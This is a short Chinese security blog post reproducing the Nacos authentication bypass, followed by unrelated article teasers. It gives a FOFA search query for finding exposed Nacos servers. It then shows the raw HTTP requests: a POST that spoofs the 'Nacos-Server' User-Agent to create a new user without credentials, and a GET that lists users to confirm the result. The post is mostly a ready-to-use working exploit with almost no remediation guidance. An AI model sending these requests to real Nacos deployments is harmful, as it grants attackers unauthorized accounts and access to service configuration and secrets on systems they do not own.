Nacos 认证绕过
小数志
共 840字,需浏览 2分钟
· 2021-02-05
Nacos 认证绕过
FOFA:title=nacos
一、漏洞概述
一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。
二、漏洞复现
2.1添加用户
POST /nacos/v1/auth/users?username=aaaa&password=bbbb HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
2.2添加成功
GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.1.2
User-Agent: Nacos-Server
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
2.3登录测试
参考:
https://github.com/alibaba/nacos/issues/4593
https://www.t00ls.net/articles-59364.html
评论
技术分享 | Python逆向:修改Pycdc源码绕过花指令
Pycdc Windows 环境准备011.安装cmake,下载链接: https://cmake.org/download/(图 1) 使用默认安装即可图 12. Pycdc项目的下载链接:https://github.com/zrax/pycdc3.在下载后的项目目录下执行以下命...
弘连网络
0
r-nacos | 超性能 nacos server 实现
r-nacos 简介 r-nacos 是一个用 rust 实现的 nacos 服务端。r-nacos 相较于 java nacos 来说,是一个提供相同功能,启动更快、占用系统资源更小、性能更高、运行更稳定的服务。 r-nacos 设计上完全兼容最新版本 naco...
JAVA架构日记
0
英伟达推出”生成式AI专业认证“,帮你成为大模型开发专家!
专注AIGC领域的专业社区,关注微软&OpenAI、百度文心一言、讯飞星火等大语言模型(LLM)的发展和应用落地,聚焦LLM的市场研究和AIGC开发者生态,欢迎关注! 3月8日,全球AI领导者英伟达(NVIDIA)在官网推出了,...
人工智能和大数据
0
Asp.NET Core 中的 认证授权 详解和使用
Asp.NET Core 中的 认证授权 详解和使用 - 醉马踏千秋 - 博客园
https://www.cnblogs.com/abc1069/p/16058146.html 什么是 验证 和 授权? 身份验证(authentication):是确定用户身份的过程 授权(authorization...
跟着阿笨一起玩NET
0
面试官:Nacos 为什么这么强!讲讲实现原理?我懵了..
来源: blog.csdn.net/cold___play/article/details/108032204 ☞ 【干货】 ChatGPT 4.0 解锁了,不限制次数提问 !!! ☞ 【干货】 清华学姐自学的Linux笔记,天花板级别! ☞ 【干货】ChatGPT 4.0 国内直接使用,不...
Java后端编程
0